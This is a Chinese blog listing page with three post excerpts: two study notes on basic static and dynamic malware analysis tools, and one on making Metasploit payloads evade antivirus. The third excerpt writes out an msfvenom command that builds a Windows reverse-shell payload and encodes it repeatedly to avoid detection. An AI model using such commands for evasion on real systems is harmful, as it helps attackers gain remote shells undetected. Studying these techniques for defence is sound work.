- 博客(3)
- 收藏
- 关注
RSS订阅原创 恶意代码分析实战(二)
恶意代码分析实战(二)动态分析基础1.沙箱沙箱可以简单的运行可执行程序但是沙箱不能分析一些需要特定的条件才能运行的恶意程序,沙箱不能记录所有的事件。2.运行恶意代码运行dll程序使用rundll32.exe程序语法为 rundll32.exe DLLNAME,EXPORT ARGUMENTSEXPORT为dll中的函数名或序号.3.进程监视器使用process monitor 监控注册表,文件,网络,进程行为4.使用进程浏览器来查看进程使用process explorer 可以查看进程
2021-12-05 01:32:28
954
原创 恶意代码分析实战学习笔记(一)
恶意代码分析实战学习笔记(一)静态技术分析基础1.使用md5deep 来识别恶意代码的哈希值2.使用strings 来查看恶意代码的字符串,从中查看有用的线索,加过壳的恶意代码的字符串会很少。3.使用peid程序来检查程序的加壳的情况4.使用dependency walker来探测动态链接函数常见函数: kernel32.dll :包含核心系统功能,如访问和操作系统内存,文件和硬件Advapi.dll:提供了对核心windows组件的访问,比如服务器和注册表User32.dll:包含了用户界
2021-11-29 01:21:53
3581
原创 2020-12-03
msf生成的payload的简单免杀通常利用msf生成的payload在不做任何处理的情况下会被杀软直接干掉,所有需要进行一些操作来进行免杀。这里我使用的是大蜘蛛杀毒软件来做的实验msf内置编码器输入msfvenom -l encoders 会出现msf提供的几种编码方式,使用这些编码对payload进行编码msfvenom - p windows/shell/reverse_tcp -lhsot 本机ip -lport 端口 -e 编码方式 -i 编码次数 -f 文件格式 -o 文件路径与名称
2020-12-03 00:40:39
555
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人